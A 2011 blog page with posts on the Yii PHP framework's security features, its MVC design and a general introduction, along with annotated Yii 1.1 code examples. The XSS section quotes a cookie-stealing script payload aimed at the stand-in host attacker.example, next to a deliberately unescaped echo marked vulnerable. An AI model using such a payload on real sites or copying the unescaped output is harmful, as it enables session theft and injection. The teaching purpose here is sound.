Monday, October 31, 2011

Security Standards of Yii Framework

One of Yii's advantages is that it ships with standard defenses against many kinds of attack from outside. The security features of the Yii framework include:

1. Cross Site Scripting prevention
Cross-site scripting (also known as XSS) occurs when a web application takes data from a user and emits it in a page without neutralising it. Attackers inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool the application's other users and collect data from them. Yii bundles the HTMLPurifier library and provides the CHtmlPurifier component as a wrapper around it. This component strips all malicious code using a thoroughly audited, secure yet permissive whitelist, and ensures that the filtered content is standards-compliant. Note that purification is for rich text that must remain HTML; plain values such as names or titles should simply be escaped with CHtml::encode() when they are output.
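As an added illustration (this is not code from the original post or from Yii itself), the following Yii 1.1 view fragment emits the same user-supplied data three ways: raw, escaped, and purified. The model, its attributes name and bio, and the attacker string are hypothetical.

```php
<?php
/* Added example: a Yii 1.1 view script, protected/views/profile/show.php,
 * rendered with $this->render('show', array('model' => $model)). The model
 * and its attributes are hypothetical. Each block shows one way of emitting
 * user-supplied data. */

// A constructed attacker payload, as it might be stored in $model->name:
//   <script>document.location='http://attacker.example/?c='+document.cookie</script>
?>

<?php /* VULNERABLE: the raw attribute is written into the page, so the
         payload above executes in every visitor's browser (stored XSS). */ ?>
<h1><?php echo $model->name; ?></h1>

<?php /* SAFE for plain text: CHtml::encode() applies htmlspecialchars() with
         ENT_QUOTES, so < > & " ' become entities and the browser shows the
         text instead of executing it. Use this for everything that is not
         meant to contain markup. */ ?>
<h1><?php echo CHtml::encode($model->name); ?></h1>

<?php /* SAFE for rich text that must stay HTML: CHtmlPurifier wraps
         HTMLPurifier with an explicit whitelist. Anything not listed
         (<script>, onclick=, javascript: URLs, <iframe>, ...) is removed,
         not merely escaped. */
$purifier = new CHtmlPurifier;
$purifier->options = array(
    'HTML.Allowed'           => 'p,br,b,i,em,strong,ul,ol,li,a[href]',
    'URI.AllowedSchemes'     => array('http' => true, 'https' => true),
    'AutoFormat.RemoveEmpty' => true,
);
?>
<div class="bio"><?php echo $purifier->purify($model->bio); ?></div>
```

CHtmlPurifier can also be used as a filter widget (beginWidget('CHtmlPurifier') ... endWidget()) around a section of a view. Purification is comparatively expensive, so for stored content it is better to purify once when the value is saved than on every render.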

2. Prevention of Cross-Site Request Forgery
A Cross-Site Request Forgery (CSRF) attack occurs when a malicious web site causes a user's browser to perform an unwanted action on a trusted site where that user is already authenticated. Yii implements a CSRF prevention scheme to help defeat POST-based attacks: it stores a random value in a cookie and compares that value with the value passed along with each POST request. Because only POST requests are checked, any action that changes state must refuse to run on a GET request, or the scheme is bypassed.
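Here is how the scheme is switched on and used in a Yii 1.1 application, as an added example that is not part of the original post or of Yii's own code. The configuration keys and the CHtml/CHttpRequest calls are Yii's; PostController, the comment form, and the route names are hypothetical.

```php
<?php
/* Added example (not from the original post or Yii). Shows the CSRF check
 * being enabled, a form that carries the token, and an action that relies
 * on it. PostController and the routes are hypothetical; three files are
 * listed in one block. */

// ---- protected/config/main.php: enable the check on the request component ----
$config = array(
    'components' => array(
        'request' => array(
            'enableCsrfValidation' => true,             // compare cookie token with POST token
            'csrfTokenName'        => 'YII_CSRF_TOKEN', // the default name, shown explicitly
        ),
    ),
);

/* ---- protected/views/post/comment.php ----
 * CHtml::beginForm() (also used by CActiveForm) appends the hidden token
 * field by itself once enableCsrfValidation is on, so this form needs no
 * change:
 *
 * <?php echo CHtml::beginForm(array('post/comment')); ?>
 *     <?php echo CHtml::textArea('body', ''); ?>
 *     <?php echo CHtml::submitButton('Post comment'); ?>
 * <?php echo CHtml::endForm(); ?>
 *
 * A hand-written <form> or an AJAX POST must send the token itself:
 *
 * <input type="hidden"
 *        name="<?php echo Yii::app()->request->csrfTokenName; ?>"
 *        value="<?php echo Yii::app()->request->csrfToken; ?>" />
 */

// ---- protected/controllers/PostController.php ----
class PostController extends CController
{
    public function actionComment()
    {
        // By the time this runs, CHttpRequest::validateCsrfToken() has already
        // executed on onBeginRequest and thrown CHttpException(400,
        // 'The CSRF token could not be verified.') for any POST whose
        // YII_CSRF_TOKEN field does not match the YII_CSRF_TOKEN cookie.
        if (!Yii::app()->request->isPostRequest) {
            // Caveat: only POST is validated. A state change reachable via GET
            // would bypass the scheme entirely, so refuse every other method.
            throw new CHttpException(405, 'Comments must be submitted with POST.');
        }
        // ... validate and save the comment here, then
        $this->redirect(array('post/view'));
    }
}
```

Since the reference value lives in a cookie, enable cookie validation as well (see the next section): with it, the token cookie is signed, so an attacker who can set cookies for the domain (for example from a sibling subdomain) cannot plant a token of their own choosing.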

3. Cookie Attack Prevention
Protecting cookies from tampering is very important, since session IDs and similar identifiers are commonly stored in cookies. Yii implements a cookie validation scheme that detects cookies modified on the client: each cookie value written through Yii is prefixed with a keyed hash (HMAC) computed from a server-side secret, and on the next request any cookie whose hash does not verify is discarded. This only covers cookies read and written through Yii's cookie collection; values taken straight from $_COOKIE are not validated.
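The following added example (not from the original post or from Yii) shows cookie validation being enabled in a Yii 1.1 application and the difference between reading a cookie through the validated collection and reading it from $_COOKIE. PrefsController, the cookie name and the key value are hypothetical.

```php
<?php
/* Added example (not from the original post or Yii): cookie validation in a
 * Yii 1.1 application. PrefsController, 'remember_theme' and the key are
 * hypothetical. */

// ---- protected/config/main.php ----
$config = array(
    'components' => array(
        'request' => array(
            // Every cookie written through Yii::app()->request->cookies is
            // prefixed with an HMAC of its value; on the next request a
            // cookie whose HMAC does not verify is silently dropped.
            'enableCookieValidation' => true,
        ),
        'securityManager' => array(
            // Key used for the HMAC. Set it explicitly: if omitted, Yii
            // generates one and stores it under protected/runtime, which
            // differs between load-balanced nodes and is lost when the
            // application is moved.
            'validationKey' => 'replace-with-a-long-random-secret',
        ),
    ),
);

// ---- protected/controllers/PrefsController.php ----
class PrefsController extends CController
{
    public function actionSave()
    {
        // Writing: goes through CCookieCollection, so the value is signed.
        $cookie = new CHttpCookie('remember_theme', 'dark');
        $cookie->expire   = time() + 30 * 24 * 3600;
        $cookie->httpOnly = true;                                    // not readable from JavaScript
        $cookie->secure   = Yii::app()->request->isSecureConnection; // HTTPS-only when served over TLS
        Yii::app()->request->cookies['remember_theme'] = $cookie;
        $this->redirect(array('prefs/index'));
    }

    public function actionIndex()
    {
        // Reading the safe way: only cookies whose HMAC verified are present,
        // so a tampered cookie simply looks absent and we fall back to a default.
        $theme = isset(Yii::app()->request->cookies['remember_theme'])
            ? Yii::app()->request->cookies['remember_theme']->value
            : 'light';

        // Reading the UNSAFE way: $_COOKIE is the raw header, the HMAC is
        // never checked, and the value still carries the hash prefix.
        // $theme = $_COOKIE['remember_theme'];   // bypasses validation, do not do this

        $this->render('index', array('theme' => $theme));
    }
}
```

The PHP session cookie itself is handled by PHP's session extension, not by this collection, so the validation scheme does not protect it; session IDs must still be sufficiently random and should be regenerated on login.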

Sunday, October 30, 2011

Model-View-Controller (MVC) Yii Framework

In an earlier post, About Yii Framework, I discussed the Model-View-Controller (MVC) pattern in Yii briefly; here I will go into more detail on what MVC is and how it works.

The Yii framework implements the model-view-controller (MVC) design pattern, which is widely adopted in Web programming. MVC aims to separate business logic from user-interface concerns so that developers can change one part more easily without affecting the others.

The model represents information (data) and business rules. A model is an instance of CModel or of a class derived from CModel, and it is used to hold data together with the business rules that apply to it.

A model represents a single data object, which can be either a row in a database table or an HTML form with user input fields. Each field of the data object is represented by an attribute of the model. Attributes have labels and can be validated against a set of rules.

Yii implements two kinds of model: form models and active records. Both derive from the same base class, CModel.

A form model is an instance of CFormModel. Form models hold data collected from user input; this data is usually collected, used and then discarded. For example, on a login page we can use a form model to represent the username and password entered by the user. For more information, please refer to Working with Forms.

Active Record (AR) is a design pattern that abstracts database access in an object-oriented way. Each AR object is an instance of CActiveRecord or of a subclass of it and represents a single row in a database table. The fields of the row are represented as properties of the AR object. Detailed information on AR can be found in Active Record.

A view contains user-interface elements such as text and input forms. A view is a PHP script that holds a particular piece of the user interface. It may contain PHP code, but that code should not modify the data model and should remain relatively simple. To keep logic and presentation separate, most logic should be placed in the controller or the model rather than in the view.

A view has a name that identifies the view script file used when rendering: the view name is the script file name without the .php extension. For example, the view named edit refers to the script file edit.php. To render a view, call CController::render() with the view name; the method looks for the view file in the directory protected/views/ControllerID.

Inside a view script, the controller instance is available as $this, so any controller property can be read in the view as $this->propertyName.

Besides ordinary views, Yii has three special kinds of view:

Layout. A layout is a special view used to decorate other views. It usually contains the parts of the user interface that are common to several views; for example, a layout may contain a header and a footer that wrap the content view.

Widget. A widget is an instance of CWidget or of a child class of CWidget; it is a component intended mainly for presentation. Widgets are usually embedded in a view script to produce complex, self-contained pieces of user interface. For example, a calendar widget can render a complex calendar interface. Widgets allow better reuse of user-interface code.

System view. A system view is a view that Yii uses to display errors and logging information. For example, when a user requests a controller or action that does not exist, Yii raises an exception describing the error and displays it using a particular system view.

System view names follow some rules. Names of the form errorXXX refer to the view used to display a CHttpException with error code XXX. For example, if a CHttpException is raised with error code 404, the error404 view is displayed.

Yii provides a set of default system views under framework/views. They can be customized by creating view files with the same names under protected/views/system.

The controller manages communication between the model and the view. A controller is an instance of CController or of a class derived from it. The application creates the controller when a user requests it. When run, the controller performs the requested action, which usually involves the necessary models and renders the appropriate view. An action, in its simplest form, is just a controller class method whose name starts with the word action.

A controller has a default action. When a user request does not specify which action to execute, the default action runs. It is usually named index, and it can be changed by setting the public instance variable CController::defaultAction.
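To show how the three parts fit together, here is one form model, one controller and one view from a Yii 1.1 application, as an added example that is not part of the original post or of the Yii project's code. The class names LoginForm and SiteController, the route names and the demo credentials are hypothetical; the CFormModel, CController, CActiveForm and CHtml calls are Yii's own.

```php
<?php
/* Added example (not from the original post or the Yii project): a form
 * model, a controller and a view from a Yii 1.1 application. LoginForm,
 * SiteController and the demo credentials are hypothetical; three files
 * are listed in one block. */

// ---- protected/models/LoginForm.php : a form model ----
// Holds data collected from user input for the duration of one request.
class LoginForm extends CFormModel
{
    public $username;
    public $password;

    // Every attribute is validated against these rules by validate().
    // Attributes that appear here are also "safe" for massive assignment.
    public function rules()
    {
        return array(
            array('username, password', 'required'),
            array('username', 'length', 'max' => 64),
            array('password', 'authenticate'),   // inline validator, defined below
        );
    }

    // Labels used by labelEx() and in error messages.
    public function attributeLabels()
    {
        return array('username' => 'User name', 'password' => 'Password');
    }

    // Inline validator: runs as part of validate(), after the rules above.
    public function authenticate($attribute, $params)
    {
        if ($this->hasErrors()) {
            return;                    // don't check credentials for an incomplete form
        }
        // Hypothetical check; a real application would use a CUserIdentity subclass.
        if ($this->username !== 'demo' || $this->password !== 'demo') {
            $this->addError('password', 'Incorrect user name or password.');
        }
    }
}

// ---- protected/controllers/SiteController.php ----
class SiteController extends CController
{
    // Action run for a request that names the controller but no action
    // (e.g. index.php?r=site). 'index' is already the default.
    public $defaultAction = 'index';

    public function actionIndex()
    {
        // Looks for protected/views/site/index.php and wraps it in the layout.
        $this->render('index', array('greeting' => 'Welcome'));
    }

    public function actionLogin()
    {
        $model = new LoginForm;
        if (isset($_POST['LoginForm'])) {
            $model->attributes = $_POST['LoginForm'];   // massive assignment of safe attributes only
            if ($model->validate()) {
                $this->redirect(array('site/index'));
            }
        }
        // Not a POST, or validation failed: show the form (with any errors).
        $this->render('login', array('model' => $model));
    }
}

/* ---- protected/views/site/login.php : the view ----
 * $this is the SiteController instance; $model comes from render()'s array.
 *
 * <h1>Login to <?php echo CHtml::encode(Yii::app()->name); ?></h1>
 * <?php $form = $this->beginWidget('CActiveForm'); ?>
 *     <?php echo $form->errorSummary($model); ?>
 *     <?php echo $form->labelEx($model, 'username'); ?>
 *     <?php echo $form->textField($model, 'username'); ?>
 *     <?php echo $form->labelEx($model, 'password'); ?>
 *     <?php echo $form->passwordField($model, 'password'); ?>
 *     <?php echo CHtml::submitButton('Login'); ?>
 * <?php $this->endWidget(); ?>
 */
```

Note the division of labour: the model decides what input is acceptable, the controller decides what to do with a valid or invalid model, and the view only renders what it is given (escaping the application name with CHtml::encode rather than echoing it raw).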

About Yii Framework

Yii is a component-based, high-performance, object-oriented (OOP) PHP framework for developing large-scale Web applications. The name Yii (pronounced /i:/) stands for "Yes It Is".

The project was started by a developer named Qiang Xue in January 2008, and Yii 1.0 was released to the public in December 2008. Remarkably, within just a few years Yii has become a PHP framework that many people ask for.

Yii surpasses other PHP frameworks in efficiency, richness of features, and clarity of documentation.

Yii has advantages over other frameworks. Here is a performance comparison chart of several frameworks:

(Chart legend) RPS: requests per second; APC: Alternative PHP Cache
The chart shows Yii's performance exceeding that of the other PHP frameworks. Yii supports caching and is explicitly designed to work efficiently with AJAX. Yii is fast largely because it uses the technique of "lazy loading" extensively: a class file is not included until the class is used for the first time, and an object is not created until it is accessed for the first time. Caching is a simple and effective way to improve the performance of a Web application: by storing relatively static data in a cache and fetching it from there when needed, the time required to generate that data is saved.
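As an added example (not from the original post or from Yii), here is data caching in a Yii 1.1 application: a cache component is configured, and an expensive query result is stored with an expiry and a dependency. The Post model, the cache key and the SQL are hypothetical.

```php
<?php
/* Added example (not from the original post or Yii): data caching in a Yii
 * 1.1 application. The Post model, 'top_posts' and the SQL are hypothetical. */

// ---- protected/config/main.php: choose a cache backend ----
$config = array(
    'components' => array(
        // CApcCache is fastest (shared memory) when the APC extension is installed;
        // CFileCache needs nothing but a writable protected/runtime directory.
        'cache' => array('class' => 'CFileCache'),
    ),
);

// ---- in a controller or service class ----
function topPosts()
{
    $cache = Yii::app()->cache;
    $posts = $cache->get('top_posts');           // false on a miss or after expiry
    if ($posts === false) {
        // Expensive, relatively static query: compute once, reuse for 5 minutes.
        $posts = Post::model()->findAll(array(
            'order' => 'views DESC',
            'limit' => 10,
        ));
        // Third argument: seconds until the entry expires. Fourth argument: a
        // CCacheDependency that invalidates the entry earlier when the
        // underlying data changes (here, when any post is updated).
        $cache->set('top_posts', $posts, 300,
            new CDbCacheDependency('SELECT MAX(updated_at) FROM post'));
    }
    return $posts;
}
```

Cache only data that is the same for every user under a shared key like this one; anything that depends on who is logged in must either not be cached or be keyed by user, otherwise one user's private data is served to another.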

Yii implements the model-view-controller (MVC) design pattern, which aims to separate logic from user-interface concerns so that any part can be changed more easily without affecting the others. In MVC, the model represents information (data) and business rules; the view contains user-interface elements such as text and input forms; and the controller manages the communication between the model and the view.

Yii also introduces a front controller, called the application, which encapsulates the execution context for processing a request. The application collects information about the user request and dispatches it to the appropriate controller for further handling.

To run a Yii-based web application you need a web server that supports PHP 5.1.0 or later. You can download Yii for free from the official website here: http://www.yiiframework.com/download/